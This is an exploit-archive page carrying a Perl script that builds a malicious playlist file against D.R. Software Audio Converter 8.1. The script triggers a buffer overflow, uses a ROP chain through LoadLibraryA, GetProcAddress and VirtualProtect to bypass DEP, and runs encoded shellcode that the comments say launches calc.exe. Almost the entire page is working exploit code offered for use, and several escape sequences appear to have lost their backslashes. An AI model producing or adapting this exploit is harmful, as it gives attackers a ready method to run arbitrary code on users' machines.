Home / exploitsPDF  

D.R. Software Audio Converter 8.1 Buffer Overflow

Posted on 16 August 2011

#!/usr/bin/perl
#
#[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit
#[+]Date: 1382011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
#[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248)
#[+]Version: 8.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#


print q{

Created By C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Site net-fuzzer.blogspot.com
};
print "
		[+]Creating Exploit File...
";
sleep(2);
#####################################ROP FOR LoadLibraryA##############################
my $rop = pack('V',0x00430076);  # POP ECX # RETN
$rop .= pack('V',0x0044B274); # Endereco de LoadLibraryA
$rop .= pack('V',0x1003d56e); # POP ESI # RETN
$rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA
$rop .= pack('V',0x10068022); # POP EBP # RETN
$rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04
$rop .= pack('V',0x0040aaf2); # POP EDI # RETN
$rop .= pack('V',0x1002ef15); #RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "kernel32.dllx00";
$rop .= "A" x 11;
#####################################ROP END HERE#######################################

#####################################ROP FOR GetProcAddress#############################
$rop .= pack('V',0x1002ef15) x 3; #RETN
$rop .= pack('V',0x00430076);  # POP ECX # RETN
$rop .= pack('V',0x0044B1E8);  # Endereco de GetProcAddress
$rop .= pack('V',0x0040aaf2);  # POP EDI # RETN
$rop .= pack('V',0x10055FBD);  # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress
$rop .= pack('V',0x1006809f);  # POP ESI # RETN
$rop .= pack('V',0x1003AA1A);  # ADD ESP,28 # RETN 04
$rop .= pack('V',0x00447b7d);  # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1002ef14);  # PUSHAD # RETN
$rop .= "VirtualProtectx00";
$rop .= "D" x 9; # Junk
#####################################ROP END HERE#######################################

################################ROP FOR VirtualProtect##################################
$rop .= pack('V',0x1002ef15) x 4; #RETN
$rop .= pack('V',0x10037d05);  # XCHG EAX,ESI # RETN
$rop .= pack('V',0x100753c0);  # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN
$rop .= "A" x 20; # Junk
$rop .= pack('V',0x10015a15);  # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1004108e) x 20;  # ADD EAX,0A # RETN
$rop .= pack('V',0x1007275D);  # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
$rop .= "A" x 4;
$rop .= pack('V',0x1002ef15) x 5; #RETN
$rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x10068022);  # POP EBP # RETN
$rop .= pack('V',0x0040A8F4);  # CALL ESP // Endereço de retorno da funçao
$rop .= pack('V',0x100080ea);  # POP EBX # RETN
$rop .= pack('V',0x00001000);  # Valor de dwSize
$rop .= pack('V',0x10082cde);  # POP EDX # RETN
$rop .= pack('V',0x00000040);  # Valor de flNewProtect
$rop .= pack('V',0x1007076e);  # POP EDI # RETN
$rop .= pack('V',0x1002ef15);  # RETN
$rop .= pack('V',0x1002ef14);  # PUSHAD # RETN
$rop .= "x90" x 25; # Some nops
$rop .= "xebx10"; # Little jmp to fix shellcode. :)
$rop .= "x90" x 20; # More nops
####################################ROP END HERE#####################################

my $shellcode =
"xb8x4bxafx2dx0exdaxdexd9x74x24xf4x5bx29xc9" .
"xb1x32x83xebxfcx31x43x0ex03x08xa1xcfxfbx72" .
"x55x86x04x8axa6xf9x8dx6fx97x2bxe9xe4x8axfb" .
"x79xa8x26x77x2fx58xbcxf5xf8x6fx75xb3xdex5e" .
"x86x75xdfx0cx44x17xa3x4ex99xf7x9ax81xecxf6" .
"xdbxffx1fxaaxb4x74x8dx5bxb0xc8x0ex5dx16x47" .
"x2ex25x13x97xdbx9fx1axc7x74xabx55xffxffxf3" .
"x45xfex2cxe0xbax49x58xd3x49x48x88x2dxb1x7b" . # Shellcode Winexec "Calc.exe"
"xf4xe2x8cxb4xf9xfbxc9x72xe2x89x21x81x9fx89" . # Bad chars "x00x20x3dx0ax0dxff"
"xf1xf8x7bx1fxe4x5ax0fx87xccx5bxdcx5ex86x57" .
"xa9x15xc0x7bx2cxf9x7ax87xa5xfcxacx0exfdxda" .
"x68x4bxa5x43x28x31x08x7bx2ax9dxf5xd9x20x0f" .
"xe1x58x6bx45xf4xe9x11x20xf6xf1x19x02x9fxc0" .
"x92xcdxd8xdcx70xaax17x97xd9x9axbfx7ex88x9f" .
"xddx80x66xe3xdbx02x83x9bx1fx1axe6x9ex64x9c" .
"x1axd2xf5x49x1dx41xf5x5bx7ex04x65x07x81";

my $buf = "A" x 180;
$buf .= pack('V',0x1001bc95); # ADD ESP,1010 # RETN 04
$buf .= "A" x 4112;
$buf .= pack('V',0x10071916) x 2; # RETN
$buf .= pack('V',0x10071910); # ADD ESP,100 # RETN
$buf .= "C" x (4436-length($buf));
$buf .= pack('V',0x10029cfd);  # ADD ESP,814 # RETN
$buf .= "A" x 124;
$buf .= $rop;
$buf .= $shellcode;
$buf .= "D" x (30000-length($buf));

open(f,">Exploit.pls") or die "[*]Error: $!
";
print f $buf;
close f;
print "		[+]File Exploit.pls Created successfully.
";
sleep(1);

 

TOP

Malware :

Exploits :